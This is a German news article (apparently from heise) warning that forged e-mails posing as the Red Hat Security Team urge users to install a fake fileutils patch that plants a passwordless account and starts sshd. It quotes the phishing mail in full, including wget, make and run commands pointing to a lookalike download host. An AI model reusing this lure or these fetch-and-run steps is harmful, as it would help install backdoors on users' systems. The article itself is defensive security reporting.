Newsletter heise-Bot heise-Bot Push Nachrichten Push Push-Nachrichten

Red-Hat- und Fedora-Anwender im Visier von Crackern [Update]

Der Linux-Distributor Red Hat warnt vor gefälschten E-Mails, in denen Anwender aufgefordert werden, das Fileutil-Paket zu aktualisieren. Der Patch installiert aber eine Backdoor.

In Pocket speichern vorlesen Druckansicht 355 Kommentare lesen
Lesezeit: 2 Min.
Von
  • Daniel Bachfeld

Jetzt geraten auch Linux-Anwender verstärkt ins Visier von Crackern: Der Linux-Distributor Red Hat warnt vor gefälschten E-Mails, in denen Anwender aufgefordert werden, das Fileutil-Paket zu aktualisieren. Laut der unsignierten Mail seien Fehler in den Befehlen ls und mkdir enthalten, mit denen ein Angreifer über das Netzwerk eigenen Code ausführen könne. Die gut nachgemachte und angeblich vom Red Hat Security Team verfasste Mitteilung enthält eine genaue Anleitung, wie ein Patch zu installieren ist: 

Dear RedHat user,

Redhat found a vulnerability in fileutils (ls and mkdir), that could
allow a remote attacker to execute arbitrary code with root privileges.
Some of the affected linux distributions include RedHat 7.2, RedHat 7.3,
RedHat 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2 and not only. It is
known that *BSD and Solaris platforms are NOT affected.
<br />

The RedHat Security Team strongly advises you to immediately
apply the fileutils-1.0.6 patch. 
This is a critical-critical update that you must 
make by following these steps: 
First download the patch from the Security RedHat mirror: 
wget www.fedora-redhat.com/fileutils-1.0.6.patch.tar.gz 

Untar the patch: tar zxvf fileutils-1.0.6.patch.tar.gz 
cd fileutils-1.0.6.patch 
make 
./inst

Der als Quelle zum Download angegebene Server www.fedora-redhat.com ist allerdings nicht von Red Hat registriert und gehört zu einem Netzblock des Anbieters Yahoo. Der Patch installiert nach ersten Erkenntnissen eine Backdoor auf dem System, in dem er ein Konto ohne Passwort anlegt und den ssh-Daemon startet.

Red Hat weist darauf hin, dass Mails vom Red Hat Security Team immer mit GPG/PGP signiert sind, ebenso wie alle offiziellen Updates für Pakete. Der Schlüssel zum Verifizieren findet sich unter www.redhat.com/security/team/key.html. Anwender sollten immer die Echtheit der zu installierenden Pakete anhand der Signatur überprüfen.

Update
Der in den Mails angegebene Server kann variieren. Unter anderem werden auch Server der Universität Standford (www.stanford.edu) zum Verteilen der Backdoor-Patches missbraucht. Auf dem Sicherheitsportal K-otik ist ein Analyse des Backdoor-Patches erschienen.

Siehe dazu auch: (dab)

Spiele

nach oben
Alle Angebote
Newsletter heise-Bot heise-Bot Push Nachrichten Push Push-Nachrichten